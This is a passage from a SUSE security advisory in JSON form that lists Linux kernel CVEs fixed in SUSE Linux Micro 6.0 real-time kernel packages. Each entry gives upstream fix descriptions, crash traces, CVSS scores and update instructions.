"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-40301",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40301"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_event: validate skb length for unknown CC opcode\n\nIn hci_cmd_complete_evt(), if the command complete event has an unknown\nopcode, we assume the first byte of the remaining skb-\u003edata contains the\nreturn status. However, parameter data has previously been pulled in\nhci_event_func(), which may leave the skb empty. If so, using skb-\u003edata[0]\nfor the return status uses un-init memory.\n\nThe fix is to check skb-\u003elen before using skb-\u003edata.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40301",
"url": "https://www.suse.com/security/cve/CVE-2025-40301"
},
{
"category": "external",
"summary": "SUSE Bug 1255193 for CVE-2025-40301",
"url": "https://bugzilla.suse.com/1255193"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40301"
},
{
"cve": "CVE-2025-40304",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40304"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: Add bounds checking in bit_putcs to fix vmalloc-out-of-bounds\n\nAdd bounds checking to prevent writes past framebuffer boundaries when\nrendering text near screen edges. Return early if the Y position is off-screen\nand clip image height to screen boundary. Break from the rendering loop if the\nX position is off-screen. When clipping image width to fit the screen, update\nthe character count to match the clipped width to prevent buffer size\nmismatches.\n\nWithout the character count update, bit_putcs_aligned and bit_putcs_unaligned\nreceive mismatched parameters where the buffer is allocated for the clipped\nwidth but cnt reflects the original larger count, causing out-of-bounds writes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40304",
"url": "https://www.suse.com/security/cve/CVE-2025-40304"
},
{
"category": "external",
"summary": "SUSE Bug 1255034 for CVE-2025-40304",
"url": "https://bugzilla.suse.com/1255034"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40304"
},
{
"cve": "CVE-2025-40306",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40306"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\norangefs: fix xattr related buffer overflow...\n\nWilly Tarreau \u003cw@1wt.eu\u003e forwarded me a message from\nDisclosure \u003cdisclosure@aisle.com\u003e with the following\nwarning:\n\n\u003e The helper `xattr_key()` uses the pointer variable in the loop condition\n\u003e rather than dereferencing it. As `key` is incremented, it remains non-NULL\n\u003e (until it runs into unmapped memory), so the loop does not terminate on\n\u003e valid C strings and will walk memory indefinitely, consuming CPU or hanging\n\u003e the thread.\n\nI easily reproduced this with setfattr and getfattr, causing a kernel\noops, hung user processes and corrupted orangefs files. Disclosure\nsent along a diff (not a patch) with a suggested fix, which I based\nthis patch on.\n\nAfter xattr_key started working right, xfstest generic/069 exposed an\nxattr related memory leak that lead to OOM. xattr_key returns\na hashed key. When adding xattrs to the orangefs xattr cache, orangefs\nused hash_add, a kernel hashing macro. hash_add also hashes the key using\nhash_log which resulted in additions to the xattr cache going to the wrong\nhash bucket. generic/069 tortures a single file and orangefs does a\ngetattr for the xattr \"security.capability\" every time. Orangefs\nnegative caches on xattrs which includes a kmalloc. Since adds to the\nxattr cache were going to the wrong bucket, every getattr for\n\"security.capability\" resulted in another kmalloc, none of which were\never freed.\n\nI changed the two uses of hash_add to hlist_add_head instead\nand the memory leak ceased and generic/069 quit throwing furniture.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40306",
"url": "https://www.suse.com/security/cve/CVE-2025-40306"
},
{
"category": "external",
"summary": "SUSE Bug 1255062 for CVE-2025-40306",
"url": "https://bugzilla.suse.com/1255062"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40306"
},
{
"cve": "CVE-2025-40307",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40307"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: validate cluster allocation bits of the allocation bitmap\n\nsyzbot created an exfat image with cluster bits not set for the allocation\nbitmap. exfat-fs reads and uses the allocation bitmap without checking\nthis. The problem is that if the start cluster of the allocation bitmap\nis 6, cluster 6 can be allocated when creating a directory with mkdir.\nexfat zeros out this cluster in exfat_mkdir, which can delete existing\nentries. This can reallocate the allocated entries. In addition,\nthe allocation bitmap is also zeroed out, so cluster 6 can be reallocated.\nThis patch adds exfat_test_bitmap_range to validate that clusters used for\nthe allocation bitmap are correctly marked as in-use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40307",
"url": "https://www.suse.com/security/cve/CVE-2025-40307"
},
{
"category": "external",
"summary": "SUSE Bug 1255039 for CVE-2025-40307",
"url": "https://bugzilla.suse.com/1255039"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40307"
},
{
"cve": "CVE-2025-40308",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40308"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: bcsp: receive data only if registered\n\nCurrently, bcsp_recv() can be called even when the BCSP protocol has not\nbeen registered. This leads to a NULL pointer dereference, as shown in\nthe following stack trace:\n\n KASAN: null-ptr-deref in range [0x0000000000000108-0x000000000000010f]\n RIP: 0010:bcsp_recv+0x13d/0x1740 drivers/bluetooth/hci_bcsp.c:590\n Call Trace:\n \u003cTASK\u003e\n hci_uart_tty_receive+0x194/0x220 drivers/bluetooth/hci_ldisc.c:627\n tiocsti+0x23c/0x2c0 drivers/tty/tty_io.c:2290\n tty_ioctl+0x626/0xde0 drivers/tty/tty_io.c:2706\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:907 [inline]\n __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0x3b0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nTo prevent this, ensure that the HCI_UART_REGISTERED flag is set before\nprocessing received data. If the protocol is not registered, return\n-EUNATCH.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40308",
"url": "https://www.suse.com/security/cve/CVE-2025-40308"
},
{
"category": "external",
"summary": "SUSE Bug 1255064 for CVE-2025-40308",
"url": "https://bugzilla.suse.com/1255064"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40308"
},
{
"cve": "CVE-2025-40309",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40309"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: SCO: Fix UAF on sco_conn_free\n\nBUG: KASAN: slab-use-after-free in sco_conn_free net/bluetooth/sco.c:87 [inline]\nBUG: KASAN: slab-use-after-free in kref_put include/linux/kref.h:65 [inline]\nBUG: KASAN: slab-use-after-free in sco_conn_put+0xdd/0x410\nnet/bluetooth/sco.c:107\nWrite of size 8 at addr ffff88811cb96b50 by task kworker/u17:4/352\n\nCPU: 1 UID: 0 PID: 352 Comm: kworker/u17:4 Not tainted\n6.17.0-rc5-g717368f83676 #4 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nWorkqueue: hci13 hci_cmd_sync_work\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x10b/0x170 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0x191/0x550 mm/kasan/report.c:482\n kasan_report+0xc4/0x100 mm/kasan/report.c:595\n sco_conn_free net/bluetooth/sco.c:87 [inline]\n kref_put include/linux/kref.h:65 [inline]\n sco_conn_put+0xdd/0x410 net/bluetooth/sco.c:107\n sco_connect_cfm+0xb4/0xae0 net/bluetooth/sco.c:1441\n hci_connect_cfm include/net/bluetooth/hci_core.h:2082 [inline]\n hci_conn_failed+0x20a/0x2e0 net/bluetooth/hci_conn.c:1313\n hci_conn_unlink+0x55f/0x810 net/bluetooth/hci_conn.c:1121\n hci_conn_del+0xb6/0x1110 net/bluetooth/hci_conn.c:1147\n hci_abort_conn_sync+0x8c5/0xbb0 net/bluetooth/hci_sync.c:5689\n hci_cmd_sync_work+0x281/0x380 net/bluetooth/hci_sync.c:332\n process_one_work kernel/workqueue.c:3236 [inline]\n process_scheduled_works+0x77e/0x1040 kernel/workqueue.c:3319\n worker_thread+0xbee/0x1200 kernel/workqueue.c:3400\n kthread+0x3c7/0x870 kernel/kthread.c:463\n ret_from_fork+0x13a/0x1e0 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 31370:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x30/0x70 mm/kasan/common.c:68\n poison_kmalloc_redzone mm/kasan/common.c:388 [inline]\n __kasan_kmalloc+0x82/0x90 mm/kasan/common.c:405\n kasan_kmalloc include/linux/kasan.h:260 [inline]\n __do_kmalloc_node mm/slub.c:4382 [inline]\n __kmalloc_noprof+0x22f/0x390 mm/slub.c:4394\n kmalloc_noprof include/linux/slab.h:909 [inline]\n sk_prot_alloc+0xae/0x220 net/core/sock.c:2239\n sk_alloc+0x34/0x5a0 net/core/sock.c:2295\n bt_sock_alloc+0x3c/0x330 net/bluetooth/af_bluetooth.c:151\n sco_sock_alloc net/bluetooth/sco.c:562 [inline]\n sco_sock_create+0xc0/0x350 net/bluetooth/sco.c:593\n bt_sock_create+0x161/0x3b0 net/bluetooth/af_bluetooth.c:135\n __sock_create+0x3ad/0x780 net/socket.c:1589\n sock_create net/socket.c:1647 [inline]\n __sys_socket_create net/socket.c:1684 [inline]\n __sys_socket+0xd5/0x330 net/socket.c:1731\n __do_sys_socket net/socket.c:1745 [inline]\n __se_sys_socket net/socket.c:1743 [inline]\n __x64_sys_socket+0x7a/0x90 net/socket.c:1743\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xc7/0x240 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 31374:\n kasan_save_stack mm/kasan/common.c:47 [inline]\n kasan_save_track+0x30/0x70 mm/kasan/common.c:68\n kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:576\n poison_slab_object mm/kasan/common.c:243 [inline]\n __kasan_slab_free+0x3d/0x50 mm/kasan/common.c:275\n kasan_slab_free include/linux/kasan.h:233 [inline]\n slab_free_hook mm/slub.c:2428 [inline]\n slab_free mm/slub.c:4701 [inline]\n kfree+0x199/0x3b0 mm/slub.c:4900\n sk_prot_free net/core/sock.c:2278 [inline]\n __sk_destruct+0x4aa/0x630 net/core/sock.c:2373\n sco_sock_release+0x2ad/0x300 net/bluetooth/sco.c:1333\n __sock_release net/socket.c:649 [inline]\n sock_close+0xb8/0x230 net/socket.c:1439\n __fput+0x3d1/0x9e0 fs/file_table.c:468\n task_work_run+0x206/0x2a0 kernel/task_work.c:227\n get_signal+0x1201/0x1410 kernel/signal.c:2807\n arch_do_signal_or_restart+0x34/0x740 arch/x86/kernel/signal.c:337\n exit_to_user_mode_loop+0x68/0xc0 kernel/entry/common.c:40\n exit_to_user_mode_prepare include/linux/irq-entry-common.h:225 [inline]\n s\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40309",
"url": "https://www.suse.com/security/cve/CVE-2025-40309"
},
{
"category": "external",
"summary": "SUSE Bug 1255065 for CVE-2025-40309",
"url": "https://bugzilla.suse.com/1255065"
},
{
"category": "external",
"summary": "SUSE Bug 1255066 for CVE-2025-40309",
"url": "https://bugzilla.suse.com/1255066"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2025-40309"
},
{
"cve": "CVE-2025-40310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40310"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namd/amdkfd: resolve a race in amdgpu_amdkfd_device_fini_sw\n\nThere is race in amdgpu_amdkfd_device_fini_sw and interrupt.\nif amdgpu_amdkfd_device_fini_sw run in b/w kfd_cleanup_nodes and\n kfree(kfd), and KGD interrupt generated.\n\nkernel panic log:\n\nBUG: kernel NULL pointer dereference, address: 0000000000000098\namdgpu 0000:c8:00.0: amdgpu: Requesting 4 partitions through PSP\n\nPGD d78c68067 P4D d78c68067\n\nkfd kfd: amdgpu: Allocated 3969056 bytes on gart\n\nPUD 1465b8067 PMD @\n\nOops: @002 [#1] SMP NOPTI\n\nkfd kfd: amdgpu: Total number of KFD nodes to be created: 4\nCPU: 115 PID: @ Comm: swapper/115 Kdump: loaded Tainted: G S W OE K\n\nRIP: 0010:_raw_spin_lock_irqsave+0x12/0x40\n\nCode: 89 e@ 41 5c c3 cc cc cc cc 66 66 2e Of 1f 84 00 00 00 00 00 OF 1f 40 00 Of 1f 44% 00 00 41 54 9c 41 5c fa 31 cO ba 01 00 00 00 \u003cfO\u003e OF b1 17 75 Ba 4c 89 e@ 41 Sc\n\n89 c6 e8 07 38 5d\n\nRSP: 0018: ffffc90@1a6b0e28 EFLAGS: 00010046\n\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000018\n0000000000000001 RSI: ffff8883bb623e00 RDI: 0000000000000098\nffff8883bb000000 RO8: ffff888100055020 ROO: ffff888100055020\n0000000000000000 R11: 0000000000000000 R12: 0900000000000002\nffff888F2b97da0@ R14: @000000000000098 R15: ffff8883babdfo00\n\nCS: 010 DS: 0000 ES: 0000 CRO: 0000000080050033\n\nCR2: 0000000000000098 CR3: 0000000e7cae2006 CR4: 0000000002770ce0\n0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n0000000000000000 DR6: 00000000fffeO7FO DR7: 0000000000000400\n\nPKRU: 55555554\n\nCall Trace:\n\n\u003cIRQ\u003e\n\nkgd2kfd_interrupt+@x6b/0x1f@ [amdgpu]\n\n? amdgpu_fence_process+0xa4/0x150 [amdgpu]\n\nkfd kfd: amdgpu: Node: 0, interrupt_bitmap: 3 YcpxFl Rant tErace\n\namdgpu_irq_dispatch+0x165/0x210 [amdgpu]\n\namdgpu_ih_process+0x80/0x100 [amdgpu]\n\namdgpu: Virtual CRAT table created for GPU\n\namdgpu_irq_handler+0x1f/@x60 [amdgpu]\n\n__handle_irq_event_percpu+0x3d/0x170\n\namdgpu: Topology: Add dGPU node [0x74a2:0x1002]\n\nhandle_irq_event+0x5a/@xcO\n\nhandle_edge_irq+0x93/0x240\n\nkfd kfd: amdgpu: KFD node 1 partition @ size 49148M\n\nasm_call_irq_on_stack+0xf/@x20\n\n\u003c/IRQ\u003e\n\ncommon_interrupt+0xb3/0x130\n\nasm_common_interrupt+0x1le/0x40\n\n5.10.134-010.a1i5000.a18.x86_64 #1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40310",
"url": "https://www.suse.com/security/cve/CVE-2025-40310"
},
{
"category": "external",
"summary": "SUSE Bug 1255041 for CVE-2025-40310",
"url": "https://bugzilla.suse.com/1255041"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40310"
},
{
"cve": "CVE-2025-40311",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40311"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naccel/habanalabs: support mapping cb with vmalloc-backed coherent memory\n\nWhen IOMMU is enabled, dma_alloc_coherent() with GFP_USER may return\naddresses from the vmalloc range. If such an address is mapped without\nVM_MIXEDMAP, vm_insert_page() will trigger a BUG_ON due to the\nVM_PFNMAP restriction.\n\nFix this by checking for vmalloc addresses and setting VM_MIXEDMAP\nin the VMA before mapping. This ensures safe mapping and avoids kernel\ncrashes. The memory is still driver-allocated and cannot be accessed\ndirectly by userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40311",
"url": "https://www.suse.com/security/cve/CVE-2025-40311"
},
{
"category": "external",
"summary": "SUSE Bug 1255068 for CVE-2025-40311",
"url": "https://bugzilla.suse.com/1255068"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2025-40311"
},
{
"cve": "CVE-2025-40312",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40312"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: Verify inode mode when loading from disk\n\nThe inode mode loaded from corrupted disk can be invalid. Do like what\ncommit 0a9e74051313 (\"isofs: Verify inode mode when loading from disk\")\ndoes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40312",
